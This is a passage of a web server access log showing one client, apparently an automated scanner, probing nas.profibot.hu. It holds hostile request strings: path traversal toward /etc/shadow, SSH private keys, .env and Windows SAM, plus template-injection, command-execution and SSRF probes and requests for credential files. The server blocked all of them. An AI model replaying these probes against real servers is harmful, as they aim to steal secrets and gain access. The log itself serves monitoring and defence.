+0000] - 404 404 - GET https nas.profibot.hu "/actuator/metrics" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/android/local.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/dev.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/netdata" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/tauri.conf.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/core/install.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/index.php/dashboard/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/notebooks/config.ipynb" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/paytm_wallet/settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 403 403 - GET https nas.profibot.hu "/.idea/.name" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/ext/settings.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/admin/debug" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/backend/backend/auth" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/app/config/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/invoice_links/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/app/etc/env.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/graphiql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/uploads/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mail/sendmail.cf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/game/settings.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/anydesk/config.ad" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/svelte.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/pos/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/app.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 403 403 - GET https nas.profibot.hu "/.ipynb_checkpoints/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/camera/recognition_settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/ci-secret.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/iap/google/play_billing.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/etc/imapd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/manager/1/performance" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/scheduler/jobs.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/:2375" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/email/campaign_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/donation/funding_map.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/account" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:49 +0000] - 404 404 - GET https nas.profibot.hu "/woocommerce/gateway-settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/autopilot/params.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/mandrill/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/payment/vault/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/core/config/config.inc.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/ecosystem.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/hls/config.m3u8" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/_internal/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/setup.py" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/build.gradle" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/jenkins" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/dns/spf.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/model/weights.bin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/env_copy" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/config/payments/credentials.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/admin/smtp-settings" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/etc/traefik/traefik.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/settings/mail.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/ca/config.cnf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:50 +0000] - 404 404 - GET https nas.profibot.hu "/package-lock.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 403 403 - GET https nas.profibot.hu "/.next/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/:8200" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/main.old" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/voice_clone/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/lab/microscope/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/xr/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/build/app/outputs/apk/release/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/preview?template={{7*7}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/android/app/src/main/res/values/secrets.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/implant/build_settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/sendgrid.env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/sucuri-firewall/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/etcd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/contracts/truffle-config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/internal-use-only/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/php-backdoor.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/xtAdmin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:51 +0000] - 404 404 - GET https nas.profibot.hu "/admin-ws/proxy?url=/internal/stats" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/:3000" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/panel/access-level=guest" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 403 403 - GET https nas.profibot.hu "/.bashrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/seon/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 403 403 - GET https nas.profibot.hu "/.ngrok2/ngrok.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/storage/logs/laravel.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/traefik.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/mysql.sql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/etc/sendmail.mc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/misc/drupal.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/Cargo.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/config/app.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/kaspersky/kav.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/android/gradle.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/users/1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:52 +0000] - 403 403 - GET https nas.profibot.hu "/.eslintrc.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/backend/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/user/register" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/usage/metering.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 403 403 - GET https nas.profibot.hu "/.config/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/app/config/parameters.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/exec?cmd=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 403 403 - GET https nas.profibot.hu "/root/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/user/edit-role" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/remix.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/template?code={{%20self%20}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/////////////var/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/gps/logs.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/adminer" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/config/binancepay.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/config/email.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/admin/events?channel=admin-only" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/secrets.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:53 +0000] - 404 404 - GET https nas.profibot.hu "/stack.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/billing/recurring_settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/analytics/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/admin/install" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/zimbra/config/mailboxd.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/ios/Podfile.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 403 403 - GET https nas.profibot.hu "/.paypal/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/ws/exec?cmd=POST%20/users/ban" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/dump.old" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" 